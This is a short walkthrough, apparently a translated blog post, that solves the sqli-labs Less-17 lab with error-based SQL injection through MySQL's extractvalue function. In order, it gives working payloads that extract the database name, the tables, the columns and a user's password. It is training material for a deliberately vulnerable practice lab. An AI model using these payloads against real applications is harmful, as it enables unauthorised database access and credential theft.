Investigate error injection
This article uses extractvalue for injection
For the principle and posture, please refer to [Network Security] sqli-labs Less-5 Detailed Analysis of Problem Solving
Determine the type of injection
As can be seen from the following echo, the injection type is single quote injection
Check library name
Account input admin
password input:
1' and (extractvalue(1,concat(0x5c,database(),0x5c)))#
The library name is security
Lookup table name
Account input admin
password input:
1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))#
echo four tables
Check column name
Account input admin
password input:
1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))#
get three columns
check data
Account input admin
password input:
1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#
Summarize
The above is a detailed analysis of [Network Security] sqli-labs Less-17 problem solving, and we will share the detailed analysis of [Network Security] sqli-labs Less-18 problem solving later.
I am Qiu said , see you next time.